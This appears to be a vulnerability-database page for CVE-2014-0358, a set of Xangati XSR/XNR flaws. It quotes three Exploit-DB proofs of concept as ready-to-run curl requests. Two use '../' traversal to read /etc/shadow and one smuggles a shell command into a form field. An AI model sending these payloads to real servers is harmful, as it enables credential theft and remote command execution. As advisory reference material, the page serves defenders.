CVE-2014-0358
published 2014-04-15CVE-2014-0358: Multiple directory traversal vulnerabilities in Xangati XSR before 11 and XNR before 7 allow remote attackers to read arbitrary files via a .. (dot dot) in (1)…
PriorityP350high7.8CVSS 2.0
AVNACLAuNCCINAN
EXPLOIT
EPSS
6.11%
92.5th percentile
Multiple directory traversal vulnerabilities in Xangati XSR before 11 and XNR before 7 allow remote attackers to read arbitrary files via a .. (dot dot) in (1) the file parameter in a getUpgradeStatus action to servlet/MGConfigData, (2) the download parameter in a download action to servlet/MGConfigData, (3) the download parameter in a port_svc action to servlet/MGConfigData, (4) the file parameter in a getfile action to servlet/Installer, or (5) the binfile parameter to servlet/MGConfigData.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Xangati - '/servlet/MGConfigData' Multiple Directory Traversals
exploitdb·2014-04-14
CVE-2014-0358 Xangati - '/servlet/MGConfigData' Multiple Directory Traversals
Xangati - '/servlet/MGConfigData' Multiple Directory Traversals
---
source: https://www.securityfocus.com/bid/66817/info
Xangati XSR And XNR are prone to a multiple directory-traversal vulnerabilities.
A remote attacker could exploit these vulnerabilities using directory-traversal characters ('../') to access or read arbitrary files that contain sensitive information.
Xangati XSR prior to 11 and XNR prior to 7 are vulnerable.
curl -i -s -k -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=foo&request=getUpgradeStatus&file=%2Ffloodguard%2Freports%2F../../../../../etc/shadow' \
'hxxps://www.example.com/servlet/MGConfigData'
POST /servlet/MGConfigData HTTP/1.1
key=validkey&request=download&download=%2Ffloodguard%2Fdata
Exploit-DB
Xangati - '/servlet/Installer?file' Directory Traversal
exploitdb·2014-04-14
CVE-2014-0358 Xangati - '/servlet/Installer?file' Directory Traversal
Xangati - '/servlet/Installer?file' Directory Traversal
---
source: https://www.securityfocus.com/bid/66817/info
Xangati XSR And XNR are prone to a multiple directory-traversal vulnerabilities.
A remote attacker could exploit these vulnerabilities using directory-traversal characters ('../') to access or read arbitrary files that contain sensitive information.
Xangati XSR prior to 11 and XNR prior to 7 are vulnerable.
curl -i -s -k -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&falconConfig=getfile&file=%2Ffloodguard%2F../../../../../../../../../etc/shadow' \
'hxxps://www.example.com/servlet/Installer'
Exploit-DB
Xangati XSR / XNR - 'gui_input_test.pl' Remote Command Execution
exploitdb·2014-04-14
CVE-2014-0358 Xangati XSR / XNR - 'gui_input_test.pl' Remote Command Execution
Xangati XSR / XNR - 'gui_input_test.pl' Remote Command Execution
---
source: https://www.securityfocus.com/bid/66819/info
Xangati XSR And XNR are prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary commands in the context of the affected application.
Xangati XSR prior to 11 and XNR prior to 7 are vulnerable.
curl -i -s -k -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&falconConfig=validateTest&path=%2Fvar%2Ftmp%2F¶ms=gui_input_test.pl¶ms=-p+localhost;CMD%3d$\'cat\\x20/etc/shadow\';$CMD;+YES' \
'hxxps://www.example.com/servlet/Installer'
No writeups or analysis indexed.
2014-04-15
Published